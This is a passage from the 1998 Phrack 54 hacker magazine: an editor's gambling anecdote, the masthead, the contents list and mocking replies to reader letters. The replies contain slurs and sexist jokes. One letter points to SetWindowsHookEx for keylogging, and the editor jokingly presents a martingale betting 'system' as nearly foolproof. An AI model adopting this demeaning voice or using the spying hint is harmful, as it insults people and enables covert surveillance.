---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 01 of 12
-------------------------[ P H R A C K 5 4 I N D E X
--------[ Living in SYN
Things that we want for Christmas: Functional remote operating system
detection. Functional remote promiscuous mode detection. Functional agent
based intrusion detection.
A note about this issue. Loyal and perceptive readers will notice this issue
is a bit smaller. There are two reasons for this. The first is swift
delivery. We are attempting to make Phrack issues a bit more svelte in
order to pump them out on a more timely basis. The other reason is quality.
There is enough garbage out there. We turn down at least half of all
submissions to bring you the good stuff. Enjoy.
Rewind to August 1998.
It's Sunday morning in Las Vegas, about 5:00am-ish. Angstrom and I decide
to leave the Hard Rock Hotel. It's been a long night of drinking and
gambling. I am up maybe $200. He's up about $30. We're both inebriated
beyond repair. We return to Jackie Gaughan's Plaza Hotel and Casino, a
wretched place where the old go to get older and everyone's got at least one
foot in the grave. Back to the Future II? Biff's Pleasure Palace? Welcome
to the Plaza Hotel.
Anyhow, we saunter on in, make our way over to the lounge and find Artimage,
Asriel, Glyph, and Alhambra.* After some random dialogue (the specifics of
which I have completely forgotten) Asriel tells me I should play some more
Blackjack.
"I only have hundreds." was my reply. I didn't want to play anymore
anyhow. This was the 6th day of my Vegas stint and I was burnt on
gambling.
"<shrug> Bet a hundred then." says As.
"<shrug> Ok." I caved.
I plop down on a unoccupied blackjack table and plunk my hundred down. The
dealer was a gentle looking 200 year old man from Laos.
"MONEY PLAYZ!" I say. I remember being very drunk.
"Money plays?" He questions? The pit boss wakes up.
"Money plays." I confirm
"Money plays!" He announces to the pit boss. The pit boss scribbles in his
book.
Here's where the details get fuzzy. I can't remember the hand I was dealt, nor
any subsequent cards. All I know is I played textbook blackjack. That's all
you need to know here. I played according to the `book`. I lost that hundred.
At that point, my blackjack betting system kicked in. I lay down 2 more
bills.
"Money playz." I repeat.
"Money plays!" He announces to the pit boss. The pit boss scribbles
something else in his little book.
My system is simple and almost foolproof. Bet small when you are just fucking
around. Bet big when you want to win big. Lose a big hand? Double your bet.
Lose again? Double it again. Lose again? Goto 1. The odds in blackjack
tend to hover around .05% house favor (this can vary widely depending on
several factors including the type of blackjack, the number of decks, the
skill of the player, whether or not the player counts cards, the card counting
scheme used, etc**). Eventually, odds are, you will win all your money back,
AND THEN SOME!*** Of course, this relies on both your bankroll and the table
maximum being unlimited. Small details I usually overlook.
So I lose the 2 hundred.
THE SYSTEM IS STILL IN FULL EFFECT. I plunk down another 4 small.
"Money plays?" The dealer musses? I nod.
"Money plays." The pit boss scribbles.
I lose another hand. Bye-bye 4 hundred.
Asriel is laughing at this point.
"Dude, I think you should quit now." He offers.
"Nah. I'm not done yet."
Hrm. Time to gather my thoughts. No more namby-pamby. Time to separate
the armchair gamblers from the hard-core haggard idiot types who end up having
to live in Vegas. I peel off 10 hundreds. 1 large is placed in that little
betting circle thingy.
"Money plays." The pit boss scribbles, Onlookers gawk, I pray.
Now this hand I remember distinctly. First card: an 8. Hrm. Second card: a
6. Ugh. Dealer shows an 8. FUCK. Oh. Good. Well, that's $1700 well spent
in about 2 minutes. Well. I had to hit. I get a 6. Wow. WOW! Dealer
flips his hold card. A 10.
"HAHAHAHHAHAHAHAHAHA" I proclaim.
"10 blacks out" The dealer shouts. The pit boss stops writing.
"Want to be rated?" He asks.
"Nope! Bye!" And off I went to cash out.
* Actually, playing basic strategy alone can sometimes give you a pretty
close to even odds (or even better then even). Usually, however, you will
find that you will need to count cards in addition to basic strategy to have a
real advantage.
** Assoc. Editor's note: If you take this advice, chances are you'll be
a very upset and angry gambler come next Defcon. Whine to route when you
can't afford a hotel room, not me. Maybe he'll let you sleep on his floor.
A special shout-out to Ron Rivest. It has worked its way down the grapevine
that he reads Phrack. Add one more to the Super Elite People That REad Phrack
(SEPTREP) list. If you are or know one of these people, please send email to
the editor to be added to the list (See linenoise for the list).
A word of caution about P54-06 and P54-10: If you attempt to apply the kernel
patches for these articles in succession on the same system, the second one
will fail at the syscalls.master file. You will need to patch this by hand.
It's not hard. Go ahead and try it. I trust you.
Enjoy the magazine. It is by and for the hacking community. Period.
-- Editor in Chief ----------------[ route
-- Associate Editor ---------------[ alhambra
-- Phrack World News --------------[ disorder
-- Phrack Publicity ---------------[ dangergirl
-- Phrack Webpage Guy -------------[ X
-- Phrack Typographical fixer -----[ silitek
-- Phrack Special Consultant ------[ redragon
-- Mad Cow disease ----------------[ sir dystic and dildog
-------- Elite --------------------> daveg
-- Official Phrack/r00t auto ------[ BMW M3
-- Your trusted security advisors -[ p and sw_r
-- Shout Outs and Thank Yous ------[ kamee, vision, artimage, chris, meenk,
-----------------------------------| the former SNI team, n8, phundie, par,
-----------------------------------| radium, k0re, horizon, dhg, mds, mudge,
-----------------------------------| bioh, pm (for the elite dox)
Phrack Magazine V. 8, #54, Dec 25th, 1998. ISSN 1068-1035
Contents Copyright (c) 1998 Phrack Magazine. All Rights Reserved. Nothing
may be reproduced in whole or in part without written permission from the
editor in chief. Phrack Magazine is made available quarterly to the public,
free of charge. Go nuts people.
Contact Phrack Magazine
-----------------------
Submissions: phrackedit@phrack.com
Commentary: loopback@phrack.com
Editor in Chief: route@phrack.com
Associate Editor: alhambra@phrack.com
Publicist: dangergrl@phrack.com
Phrack World News: disorder@phrack.com
Submissions to the above email address may be encrypted with the following key:
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQENAzMgU6YAAAEH/1/Kc1KrcUIyL5RBEVeD82JM9skWn60HBzy25FvR6QRYF8uW
ibPDuf3ecgGezQHM0/bDuQfxeOXDihqXQNZzXf02RuS/Au0yiILKqGGfqxxP88/O
vgEDrxu4vKpHBMYTE/Gh6u8QtcqfPYkrfFzJADzPEnPI7zw7ACAnXM5F+8+elt2j
0njg68iA8ms7W5f0AOcRXEXfCznxVTk470JAIsx76+2aPs9mpIFOB2f8u7xPKg+W
DDJ2wTS1vXzPsmsGJt1UypmitKBQYvJrrsLtTQ9FRavflvCpCWKiwCGIngIKt3yG
/v/uQb3qagZ3kiYr3nUJ+ULklSwej+lrReIdqYEABRG0GjxwaHJhY2tlZGl0QGlu
Zm9uZXh1cy5jb20+tA9QaHJhY2sgTWFnYXppbmU=
=1iyt
-----END PGP PUBLIC KEY BLOCK-----
As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED. Phrack goes out
plaintext. You certainly can subscribe in plaintext.
phrack:~# head -20 /usr/include/std-disclaimer.h
/*
* All information in Phrack Magazine is, to the best of the ability of the
* editors and contributors, truthful and accurate. When possible, all facts
* are checked, all code is compiled. However, we are not omniscient (hell,
* we don't even get paid). It is entirely possible something contained
* within this publication is incorrect in some way. If this is the case,
* please drop us some email so that we can correct it in a future issue.
*
*
* Also, keep in mind that Phrack Magazine accepts no responsibility for the
* entirely stupid (or illegal) things people may do with the information
* contained herein. Phrack is a compendium of knowledge, wisdom, wit, and
* sass. We neither advocate, condone nor participate in any sort of illicit
* behavior. But we will sit back and watch.
*
*
* Lastly, it bears mentioning that the opinions that may be expressed in the
* articles of Phrack Magazine are intellectual property of their authors.
* These opinions do not necessarily represent those of the Phrack Staff.
*/
-------------------------[ T A B L E O F C O N T E N T S
1 Introduction Phrack Staff 22K
2 Phrack Loopback Phrack Staff 58K
3 Phrack Line Noise various 90K
4 Phrack Prophile on the parmaster Phrack Staff 26K
5 Linux and Random Source Bleaching phunda mental 174K
6 Hardening OpenBSD for Multiuser Environments route 90K
7 Scavenging Connections On Dynamic-IP Networks Seth McGann 34K
8 NT Web Technology Vulnerabilities rfp 40K
9 Remote OS detection via TCP/IP Stack Fingerprinting Fyodor 58K
10 Defeating Sniffers and Intrusion Detection Systems horizon 100K
11 Phrack World News Disorder 240K
12 extract.c Phrack Staff 32K
966K
-----------------------------------------------------------------------------
"...a bellvue in the mental hospital world of media whore web pages..."
- xanax on #phrack, 10-13-1998, when asked to comment on Antionline.
"This is not a tool we should take seriously, or our customers should take
seriously..."
- Edmund Muth, Microsoft, as reported by the New York Times,
referring to Back Orifice. (How many thousands of machines were
owned with BO?)
*deraadt* your style is so unlike anyone elses, that is makes no sense that
you have this "style"
- Theo Deraadt, OpenBSD project leader, refering to route's code in
this issue.
"So I thought of something useful I could do with the money. I bought
a Nintendo 64 for one of my sisters, who has a slight mental retardation.
The reason for this was because the doctors have always told us that
things to stimulate her hand eye coordination would help her."
- Chameloen of the `masters of downloading` "hacking group",
commenting on why he didn't spend money on medical care for his
sister.
-----------------------------------------------------------------------------
----[ EOF
---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 02 of 12
-------------------------[ P H R A C K 54 L O O P B A C K
--------[ Phrack Staff
Phrack Loopback is your chance to write to the Phrack staff with your
comments, questions, or whatever. The responses are generally written by
the editor, except where noted. The actual letters are perhaps edited
for format, but generally not for grammar and/or spelling. We try not to
correct the vernacular, as it often adds a colorful perspective to the
letter in question.
0x1>--------------------------------------------------------------------------
My boyfriend turned homself into a transexual and dumped me for another
guy.What could you do to help me (please)show him how much I appreciate him?
Or,what should I do?THIS letter is no prank.This truly happened and I was
hoping for some advice from you so PLEASE don't blow up my
computer.Sincerely,B.C.
[ I swear to god this is an actual letter. I can't make this stuff up
(no sarcastic commentary needed here). ]
0x2>--------------------------------------------------------------------------
An interesting zine you have, but I have to say my favourite part is
the loopback section. The writing in the letters is passing at best,
while the satirical commentary is absolutely first rate. I just read
loopback from #53 and I just kept laughing. Way to go. Hey, as I
say, don't take life seriously, it doesn't take you seriously.
[ Thank you. We aim to please. ]
0x3>--------------------------------------------------------------------------
What is the system a school uses called? PBX? How can I hack the system
and what type of priveleges can I gain?
LocoJ
[ You can listen to the school officials talking about how much of a
retard they think you are and how they are going to hold you back another
year. ]
0x4>--------------------------------------------------------------------------
Have you ever wandered how people called hackers keep on annoying government
agencies and major corporations?
[ I often find myself wandering that very thing. ]
Most secure government information is not a secret to these people, no
protection guarantees safety against their breaking in.
[ No one can eat just one! ]
Some people may think that in order to be a hacker one must be extraordinary
smart, use expensive equipment and have contacts with the underground world.
[ That's about the size of it. And we all have sex with models. That's
key. ]
This is not true. Recent studies show that a computer user is at least
twenty percent smarter than an average person.
[ Uh. Yah. That's a great statistic. Who doesn't use a computer
these days? The only people not using computers are either mumbling
retards or are hooked up to computers to live. ]
If you are reading this you are smart enough.
[ However, if you are *writing* it, evidently, you're not. ]
All the equipment you need is your computer and modem. And try to avoid
contacts with the underground world - they are trouble.
[ Indeed. Stay away from the people who really know what they are doing.
Be sure to blanket yourself with blissful ignorance. Live a sheltered
life alone. Stay away from people. They will only hurt you with
words. ]
All you really need is information.
[ "..which you won't get here!" ]
For the first time information kept secret both by government and hackers is
available to public. Our informational report contains everything you need to
know about hacking including: *"Hackers 101" - the ultimate and comprehensive
step by step guide to how it's done. This incredible guide written by an
accomplished hacker especially for beginners will answer following questions:
[ Accomplished at bathing himself and being able to tie his left shoelace
and most of the right one. ]
-What should you know about hacking and where to start?
[ Start at your local brothel! ]
-Programs needed.
-List of access numbers.
[ How about a list explaining what these numbers are supposed to access. ]
-How keep yourself safe.
-Cracking programs, what they do and how they work.
-UNIX, an easy approach.
-Password shadowing.
-Dialouts.
-Scanners.
-Brute force hacking.
..and much more.
[ -programing for the ultimate idiot
-hookers and pimps: a two day tutorial
-circus animal social engineering
-building chicken flavored air conditioners ]
Hacker resources on the Internet: The most complete collection of real life
hackers websites where you can find:
-programs
-tools
-scripts
-most recent know-how and techniques
-news from the world of hacking
[ NEWSFLASH: YOU SUCK ]
-tones of other useful information.
You can receive our report as a printed material (only $9), on a floppy in
.txt format (only $7) or by email in *.txt format/ZIP file (only $7).
[ And you can receive a thump on the head from the Phrack staff if you
actually send these precious retards any money. ]
For domestic orders S&H is $1. For orders from Alaska, Hawaii and foreign
countries please add $5 for S&H. For email orders S&H does not apply. Order
now and as a free bonus you will receive a guide to Internet sites with
thousands of totally free software titles (limited time only). Send cash,
check or money order to:
TWS, PO Box 1357 Rancho
Cordova, CA 95741.
For check orders please allow one week for clearance.
[ ...so i can ask my mom to cash it for me... ]
Disclaimer:
Please keep in mind that any information we provide is for educational
purposes only.
[ Educational? Try mildly recreational at best. ]
TWS is not responsible for any actions of its clients.
[ ...because we have no clients... ]
0x5>--------------------------------------------------------------------------
Before I start, if this is the wrong address I should be grovelling to
then I apologize profusely.
[ It's probably not the wrong address, but I accept your apology for
what will probably be an inane question. ]
I'm relatively new to the entire computer world. I mean I've had a
computer for a number of years and the internet for about 15 months but
I feel that I don't know enough.
[ As if one can ever feel that she `knows enough`. ]
I'm BORED with what I can do and I was wondering if you could tell me or
[ Bored with nothing I can understand. ]
perhaps face me in the direction I need to go to learn how to hack. The
very basics. The amoeba level of hacking if you will.
[ Ok. Start small. Start with hacking napkins and forks and spoons,
then slowly move onto more complex devices like drawers and scissors.
Someday you can move on to wall clocks and `the clapper`. You'll
get there eventually. ]
Ever since I've been online I've always wanted to know how to hack. You
see the articles on captured hackers and the news on firms trying to boost
online security and it makes you want to go out there do stuff.
So if you've got the
[ "Do stuff"? Well. You've certainly got the right mentality. Hey,
maybe sometime I can come over to your house and we can watch T.V. or
listen to CDs or something. ]
time, it would really be appreciated.
Much appreciated,
-Dallor
0x6>--------------------------------------------------------------------------
do you have a chat room? i was told you could teach me some stuff about
computers.i am very new to the computer world @ my old age.i mess my system
at every 2weeks do to the fact i dont know what to do!
[ I suggest you look into other hobbies. Maybe nursery rhyming? ]
- naynay
[ Sha-naynay! ]
0x7>--------------------------------------------------------------------------
Hello, just wanted to congratulate you guys for an excellent
magazine and keep up the hard work. Also I have noticed that
ppl can ask for things. So could I please have a two storey
mansion, Porsche, Harley Davidson, yacht, five million dollars,
seven beautiful girls (one for each night), ..................
.............................................. thank you :-))
cheers Rundus
[ You are a shallow materialistic person Rundus. People all over the
world are suffering from famine and disease. Maybe you should give
some thought to them. ]
0x8>--------------------------------------------------------------------------
[ P53-02@0x12: ... I would like to know more about marshmellows... ]
Well, since Phrack has gifted me with so much knowledge, it's time for me
to start giving back!
[ NIGH time if you ask me... ]
Marshmellows date back to Ancient Egypt where the ancients took the roots
from a mallow plant/tree and made it into a sticky paste. From there it
was cooked to form a puffy yellowish treat for the Pharoahs and such. The
mallow "treat" became popular in the 30's as a confectionary treat. However,
due to the long process of making these treats, they did not reach the
popularity of today until Marshmellow making was revolutionized in the 60's.
The "jet-puffed" method was introduced. The sticky base material was mixed
with sugars and other additives and puffed using a airation type machine.
The marshmellow comes out of the machine in long tubes and is cut to form
the shape of what we know as marshmellows today.
For the history of corn flakes, SPAM, or Jello, please contact your
neighborhood loser.
[ Hrm. I suppose you think marshmellows are in the upper echelon of
confectioneries? WHAT GIVES YOU THE RIGHT? ]
My thirst for knowledge is not limited to computer systems. Sadly..
Ray K.
[ Tune in next issue when Ray gives a dissertation on Peter Scolari's
career in the television industry entitled: "From Bosom Buddy to
Honey I'm Drunk Again and Out of Work"... ]
0x9>--------------------------------------------------------------------------
Hey!
I was wondering if you could help me to find some things?
[ Sorry bro. I don't know where your family is. I think they've ditched
you. I say pick up and move on. ]
Well I'm in to games. And I know that x-files have got a game with the
same name. Do you know where I can find it so that I can download the
game on my computer???
[ Hrm. Try Best Buy or maybe Babbages. ]
And do you know some good sites where you can find ONLY mp3s???
Thanks for your time
Cybers
[ What an excellent and unique nickname! ]
0xa>--------------------------------------------------------------------------
Pretty clever.........I saw the web page on the tv........PHRACK......bein'
where you come from wasn't hard to find this page.......
[ Uh. Rite. ]
Just thought it was hilarious and totally in the right to show that not
everyone is as safe as they would like to think..... A SUPPORTER of your
beliefs I am......
[ Cool. We need more zealots for our secret army. ]
Thanks fer showin hacks still live a breath beneath everyone else........
[ Huh? ]
after all it's only wrong if you get caught......consequences dictate the
course of ACTION...(REV. JAMES KEENAN MAYNARD,tool)
[ Well, actually, getting caught is independent of equity. And letting
consequences dictate the course of action seems rather backward and
after-the-fact-ish. ]
Bit-Basher......
0xb>--------------------------------------------------------------------------
Just thought I would write in to voice my concern about a growing problem
in our community: Lamers and Idiots.
Alot of the time people ask me what makes up a lamer.
[ Perhaps they are asking you because you fit the mold so nicely. ]
IN my opinion, if you are 2 or more of these, you are a lamer/idiot.
[ In my opinion, you are an idiot if you make lists about what comprises
idiocy. ]
1- unnecessarily ask for information that any damned idiot could find in
10 minutes on a search engine
[ Somehow I doubt people of any level of intelligence come to you for
answers. Idiots can smell each other out pretty well. ]
2- Talk in leet-speek ("haY d00dZ Eye'm uhn 3l33t hax0r, g1v3 m3 p455w0rd5!")
and expect everyone to give you the slightest sliver of respect
[ Please don't ever email me or Phrack Magazine again. I don't care
how much of a good idea it seems, don't do it. The heat death of the
universe had better happen before I hear from you again. ]
3- Shoot your mouth off about stuff you know NOTHING about
[ Or in your case, ANYTHING. ]
4- Claim to run or own high sites (ArchAngel claiming to own the L0pht is an
excellent example).
[ Who the hell is that? ]
5- Ask for exact instructions on how to hack a site
[ A little game I like to play when I'm bored is `find the moron`. Woop!
There you are! ]
There's more criteria, I'm sure, but I just can't think of it.
[ BUT HOW WILL THE IDIOTS AMONG US COPE!@? ]
Newbies constantly ask to be taught.As for the newbies out there -
who are on the verge of becoming lamers - I think the best advice we can
[ Oh. No. Nono. Don't do that. Please. `We`. Do not refer to us as
peers. ]
give them is that hacking is not a "teachable" skill. It's something that
has to be learned through experience - you have to know how things work,
how things interact, and that invlves educating yourself. Never rely on
someone else to give you acurate information - always look for the facts.
[ Good plan. Never attempt to learn from anyone. Be your own mentor.
School yourself in ignorance. ]
Well, I'm not really sure what that rant was about but thanks for
listening to it..
[ Well if you don't then I sure as hell have *no* fucking idea. ]
{BTW Phrack 53 was great. Keep it up.}
[ Hey Thanks! Always nice to hear when we're doing a good job! ]
0xc>--------------------------------------------------------------------------
Hey, i'm new at this. how do i get started? see i want to find out some
yahoo codes. is there anything i should know? i don't have a clue what
is legal and what is not...
[ Ok. That's simple. `Cyberspace` is kinda like the Old West. There's
one guy who hangs out and deters criminals with his magic busket of
moral redemption. Any wrong-doer who comes in contact with it instantly
regrets his sin and is then forgiven. The busket is faulty though and
sometimes (about 30% of the time) the person just explodes. However,
scientists and alchemists from Brown University are working on a magic
pill that will prevent this occasional exploding. It doesn't so much
*prevent* the exploding though, as much as it pieces the person back
together *after* the explosion. The rub is that you have to take the
pill prior to explosion. And no one wants to take the pill because it's
like a red flag to the authorities that you are a wrongdoer.
Oh wait, maybe that was a dream I had. ]
form Bisker
[ Shape-of... a spider monkey! Form-of... a bisker! ]
0xd>--------------------------------------------------------------------------
I need help I know you must be thinking that I am some lamer with AOL and
Windows who will never in his life become a hacker.
[ I kinda just had you pegged as someone who is scared of punctuation. ]
Well, most of that is true but I (Hopefully in time) will become a hacer.
[ Godspeed. ]
I need to know how do I protect my computer from other hackers?
[ Ok, I'll give you an insider tip. Here's what we do to keep our
computers safe from electronic ruffians: we use them once, then throw
them away. ]
Are there any .txt documents that you think I should read?
[ Check out the one entitled `My Two Mommies`. It answered _a lot_ of
questions for me. ]
I need all I can get on this topic so i can finally move on to the next step
(I don't know what that is yet my friend is helping me become a hacker).
[ Did he read "My Two Mommies"? If not, he's a charlatan. He's probably
just telling what you want to hear so you'll sleep with him. I'd shank
him once in the leg to be safe. ]
I don't care how many things I have to read just as long as I can become a
hacker.
[ Just think! If you're reading this, you're *that* much closer! ]
P.S. I had no clue who to send this to so I picked you (Doesn't that make you
feel special?). Also please don't make this public I went to some websites and
found Hackers love making fun of lamers and posting the mail they get on there
sites so I have this feeling that your going to post this letter somewhere.
Just don't please.
[ Not a problem. I'll keep this to private email. ]
0xe>--------------------------------------------------------------------------
Just browsed yr web page... you are an interesting person.
[ Agreed. ]
I 'd love to come to your r00t party (honest); may I?
[ Absolutely not. ]
I leave in greece and I am planing to travel to the u.s. this xmas.
[ That's nice. ]
It would be a grate opertunity for me to meet you and your friends.
[ Yes, but it's just as good an opportunity for you not to meet us. ]
PS: I am not a hacker, I just admire your work.
[ Well, thank you very much. That's good to hear. ]
liquid, Wed Sep 16 06:24:09 1998
0xf>--------------------------------------------------------------------------
hi todos
[ Who? ]
i was just reading some files about hacking and phreaking by french writters
than one or two suggestions came to my mind
(i) stop writing like a pre-pubescent boy with lot of ***eZ and B1abL4(blabla)
[ YAH! YOU DAMN FRENCH COMMIE NAZI BASTARDS! ]
(ii)be more explicit and professional like in PHRACK
[ YAY AMERICA! ]
so i hope that i have rung the bell to the wrong door, and that the french
scene does not look like that.
[ Huh? ]
another thing: does hack include studying and find flaws in religious system ?
[ Shure, why not? ]
because in fact religious system are formal system based and we can always find
paradox (godel's theorem) if yes i would have a futur paper for phrack
[ Alright. ]
i have an os name for mythrandir 'TRYOS' it's very short and really summerises
his work
THANK FOR ALL YOU DO FOR THE HACKER COMMUNITY
PHRACK IS THE BEST THING I HAVE EVER READ
[ WELL GOOD. IT'S THE BEST THING I HAVE EVER WRITTEN. ]
TFAYD.
0x10>-------------------------------------------------------------------------
man just to let you know, this is some very "educational" info. can't
say that i learned a lot, but this info help me catch up the past five
years. been in the navy, man it sucked, but i want to commend y'all.
but it's like they say, smart enough to do it, then do it, but it's your
consequences. to all the "real" people out here in this beloved world,
too bad they don't know reality. anyways, this is dope, it is the
bomb.
[ Word `em up on the level. ]
--vadaka--
0x11>-------------------------------------------------------------------------
Hi. I am OmniLynx, and I'm thinking of starting a new Web-Zine for hackers.
[ Hey! Sounds like a great niche market! ]
In the true spirit of hacking, it will be free to anyone who wants it.
[ In the true spirit of martyrization and self-glorification. ]
Unfortunately, at this point it is still just a thought, because I do not
have enough sources to make it any good. I'd like to know if you would want
to become a source for my Web-Zine. All you have to do is scout out tips,
tricks, news stories, anecdotes, etc. for or about hackers.
[ Please, may I? Can I be your intern? I'll be your Jimmy Olsen!
Let me set aside my professional career, my personal life, and my ezine
with it's 14+ year history and get _right_ on that. ]
Unfortunately, you can't be paid for this, because it is free, but you will
[ BAH! Who needs money? Your adulation is payment enough! ]
get your name published and, possibly, be able to express your thoughts in
a column.
[ SHUT UP! I would be able to write a column?!@ Wow! I need to break
out my `Sony's My First Zine Kit` and get started! ]
OmniLynx
[ Dude. That's ironic. I almost chose the nick `EverpresentBobcat`. ]
0x12>-------------------------------------------------------------------------
HI phrack,
I am just reading phrack #52 `phrack loopback'.
You are just making me to laugh to dead. Better than any joke mailing-list
[ HOLY SHIT! Dude, I don't want anyone to laugh to dead! If everyone
laughs to dead, how will I get any repeat business? ]
fred
0x13>-------------------------------------------------------------------------
Been fucking around on the internet for about 3 years. After I got over
the intial rush of "WOW, look at all this fuckin software!"
[ And porn. ]
(and concurrently dumping OS/2 and msdog for Linux), I started reading...and
reading....and reading...then I ran into Phrack. In a word - KICKASS!
[ Thankz Cartman. ]
I've been reading all of the issues the last couple of daze and I'm really
impressed with the overall feeling of it. It's great reading about past
'battles' with the telco and systems (Phiber Optik stuff comes mind), the
DETAILED instructions given about various terminals, and the schematics
and stuff. History, Software and Hardware.
[ Don't forget all the great articles about bombs! Smoke bombs, bolt
bombs, acetylene bombs, shell bombs... Ah yes, the mid-80's were a
tumultuous time when youth felt the need to blow things up. ]
Besides pussy and beer, I can think of no more interesting subjects.
[ Except perhaps degrading and objectifing women. ]
I applaud the way you've kept it going by passing it on. I applaud that
you've remained true the idea "All information is public information - and the
aquisition thereof". I applaud the fact that it has survived this long - for
free. Next to the kernel - PHRACK[0-5][1-9] just might be the most important
bits on my machine. Keep it up fuckers - cause sure as taxation without
representation, they are gonna try and stomp you (us).
[ (you). ]
p.s. pointers on to how to hack sendmail to totally rewrite the headers
and envelopes to reflect a completely bogus username/system (for
purposes of anonymity - such as email like this) would be
greatly appreciated. If the pointer is 'grep sendmail ./PHRACK*' then...
..<sheepish grin>....nevermind...
You fuckers rock.....
Deicide
[ I've decided you suck. ]
0x14>-------------------------------------------------------------------------
I can prog............If you tell me how to hack I'll send my best
progs.......
[ Oh, that sounds like a fair trade. ]
I am leada of Warco
[ I am Lothar of the Hill People. ]
0x15>-------------------------------------------------------------------------
Can you get me in touch with anyone in Chicago who can help me retreive
deleted documents from my home computer.
Thank You
[ I think Emil is free. Give him a ring. ]
0x16>-------------------------------------------------------------------------
I WAS WONDERING IF YOU KNEW WHERE I COULD FIND OUT HOW TO CONNECT TO AND
HAACK PEOPLE'S PERSONAL COMPUTERS, OR MAY'BE YOU KNOW.
I'D APRECIATE SOME ADVICE,
[ Don't breed. ]
X-3
0x17>-------------------------------------------------------------------------
I need An Infectiouse Virus to corupt a small network
If you have any idea where i could get one send me aline
[ I need love and understanding. I'll trade you. ]
0x18>-------------------------------------------------------------------------
Hey...I'm not into hacking or anything, but I read an article about you and
Phrack in the Worcester Telegram and Gazzette this morning. I just wanted to
tell you that I feel your not bending to goverment pressure and everything is
very kool. This isn't about anarchy, it's about rights; freedom of the press.
Ya know? Anyhow, I will not take up anymore of your time. Remember, hackers
have rights too.
[ Some of us have mean leftz too. ]
0x19>-------------------------------------------------------------------------
It would be nice to be able to contact someone to do some hacking for you
in a specific manner.
[ Sorry. We only hack in a vague, nebulous manner. ]
Do you have any listings for this type of individuals?
[ Try http://www.fbi.gov/fugitive/fpphome.htm. We usually recruit from
there. ]
0x1a>-------------------------------------------------------------------------
Hi there!
First off, just let me say how incredibly awesome and all powerful
Phrack is, especially issue 52.
[ A SUPREMELY POWERFUL JUGGERNAUT OF EFFICACIOUS POWER! ]
You have an amazing 'zine here, and I bow before you and worship the ground
you walk on. In fact, I think world domination is now in your grasp.
[ Shure, if all the world was as obsequious as you, we'd be set. ]
< Yes, I'm hitting on you :P >
[ Cool. Are you a hot chick? If not, back off fagbasket. ]
Really though, I'm just writing to thank you for Phrack Loopback.
[ A self-fulfilling prophecy. Here we are. ]
While everything in Phrack is good, and the majority is great (as rated on
[ How can everything be good, yet the majority be great? ]
the sliding scale of total goodness), the thing that gives me the most
spiritual fulfillment every issue is Loopback. It provides 78% of daily
allotted humor and 37% of the required sarcasm for mental well being.
[ And now you're a part of the love. *hug* ]
So, once more, thank you for the brilliant staff you have at
Phrack, and thanks as well to the people who write in!
[ KEEP THOSE LETTERS AND CARDS COMING! ]
Unit3
0x1b>-------------------------------------------------------------------------
Hello, i know i am going to sound very lame when i ask this. I would
really like it if you could give me a quick breif description on how to
hack into system remotely i can hack but i can break into systems
without having a login and pw, well thnx ne ways
[ You suck. ]
0x1c>-------------------------------------------------------------------------
I don't really know who to contact about this. It's a complament to all
of phrack magazine about the owning thing.
I am glad to see u guys take it well. I don't know if i would be able
to take it as well. But it is definitely respectful. I and many other
people already respected phrack magazine a lot.. but now I definitely
have a lot more respect for phrack.
[ Dude, you get anymore respect for us and you'll officially qualify for
the `Phrack Magazine Hoover Super Suck-up Award`. It's a pretegious
award only given out to a select few. You're defnintely in the
running. ]
SPy109
0x1d>-------------------------------------------------------------------------
sir
when i down load an item from your page its in X's O'o and boxes.
[ Oh. You must have reached our tic-tac-toe server by mistake. Try
the URL again. ]
i tryed ms/word note pad/ and no luck. can you help,im also looking for an
article on how to go through the back door of AOL
[ I think there's one in the Virginia office, on the second floor. It's
Penski's office, and he never locks his door, that fucking moron. ]
from my office to my home over the Internet.
[ Oh. In that case, did you try wishing really, really hard? That
usually works for me. ]
so i could check on my spouse who i think is doing me wrong.
[ Oh, I can assure you, your spouse is up to no good. I think you should
definitely get a divorce and take the kids. ]
thanks
0x1e>-------------------------------------------------------------------------
[ P53-07: A Stealthy Windows Keylogger ]
Dearest Phrack,
I read "A Stealthy Windows Keylogger" in Phrack 53.7. Huh? Just
call SetWindowsHookEx(). It's built right into the operating system. It
lets you grab key strokes. It's simple. It even works on Windows NT.
There is no reason to go hooking interrupts or writing chunks of
inline assembly.
The documentation explains how SetWindowsHookEx() works. If that's still
not enough to go on, the Microsoft SDK ships with example programs that
grab key strokes.
- Iskra
0x1f>-------------------------------------------------------------------------
I see and hear all this about hackers; however, I never see and/or hear about
how it is done.
[ Like ninjas, true hackers are shrouded in secrecy and mystery. You may
never know -- UNTIL IT'S TOO LATE. ]
The reason I am asking is because of a soon-to-be-ex-wife who stole me cash I
[ Are you Irish? ]
operate my business with. I know she has placed the money in a bank somewhere
in my home town. Is there a way to find out which bank if I know she SSN?
[ I bet she's one of those fiery Irish Lass's with flowing locks of red
hair and glittering green eyes. You think she'd go for me? How much
money she gank from you... Enough for her to run away and lavish me
with gifts? ]
------------------------------------------------------------------------------
----[ EOF
---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 03 of 12
-------------------------[ P H R A C K 5 4 L I N E N O I S E
--------[ Various
0x1>-------------------------------------------------------------------------
The r00t/h4g1s peace summit - 1998
----------------------------------
In a digital world marred by strife and conflict, it was only fitting
that the two mega-super powers of the digital underground met for a peace
conference somewhere they could partake of the peace pipe. Amidst the
quaint silence of the fluttering windmills of Holland, the representatives
of their respective parties settled in for a week of negotiations in the
heart of Amsterdam.
Day 1:
They paint fake flies (the flying kind, not the zipper kind) on the
toilets in the Schlipteinheinekinoffien airport in Amsterdam, because,
as we all know, hackers can't resist a good target. The next stop was
to our official reception at the Hotel Ibis. I walked into the room,
meeting face to face with 7 of the most notorious and feared hackers
alive. My heart raced, and I felt all the sweat glands on my body release
in one giant orgasmic instant. And then I started coughing...
Day 2:
My throat severely scarred from the previous day of going to "coffee"
shops and buying (legally) some marijuana with such names as "The Elite
Buddha", and "Zero Day", we set out for some serious negotiations on the
second day. Our mission was to create a truce, allowing the free
transportation of our packets, unencumbered, unmodified, and unmonitored,
across the Internet. H4g1s demanded r00t supply them with "-1 Day" in
exchange for peace.
r00t requested a "-1 day" from an Internet savvy street person who kept
reminding us of our r00t brother, X. The street person, we'll call him
Outlaw, showed us some pills, but they did not appear to be what
h4g1s was looking for. So, we decided to move on. Outlaw, however, had
other ideas. He wanted his 25 guilders to take his aspirin to X,
